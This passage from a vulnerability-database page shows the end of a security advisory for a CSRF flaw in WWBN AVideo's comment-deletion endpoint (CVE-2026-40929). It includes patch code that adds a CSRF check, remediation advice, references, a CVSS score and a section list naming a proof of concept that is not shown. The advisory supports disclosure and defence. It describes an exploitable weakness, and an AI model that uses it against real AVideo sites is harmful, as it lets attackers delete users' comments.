required\u0027]));\n}\n// --- end added ---\n\n$obj = new stdClass();\n$obj-\u003eerror = true;\n$obj-\u003emsg = \u0027\u0027;\n$obj-\u003eid = intval(@$_POST[\u0027id\u0027]);\n$obj-\u003estatus = false;\n\nif (empty($obj-\u003eid)) {\n    $obj-\u003eid = intval(@$_POST[\u0027comments_id\u0027]);\n}\n...\n```\n\nStronger (recommended): also require a short-lived global token via `verifyToken()` as the in-source comment in `objects/include_config.php` prescribes, and audit every other `objects/*.json.php` handler that performs a write \u2014 the same omission likely affects additional endpoints and should be handled project-wide, ideally through a shared bootstrap that enforces `forbidIfIsUntrustedRequest()` for any `json.php` that mutates state.",
  "id": "GHSA-8qm8-g55h-xmqr",
  "modified": "2026-04-14T23:13:09Z",
  "published": "2026-04-14T23:13:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo is missing CSRF protection in objects/commentDelete.json.php enables mass comment deletion against moderators and content creators"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40929 (GCVE-0-2026-40929)

FKIE_CVE-2026-40929

GHSA-8QM8-G55H-XMQR

Summary

Details

Vulnerable endpoint: objects/commentDelete.json.php

Authorization inside Comment::delete() does not stop CSRF

Site-wide cookie policy makes cross-site delivery reliable

Attacker model / victim value

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature

Vulnerable endpoint: `objects/commentDelete.json.php`

Authorization inside `Comment::delete()` does not stop CSRF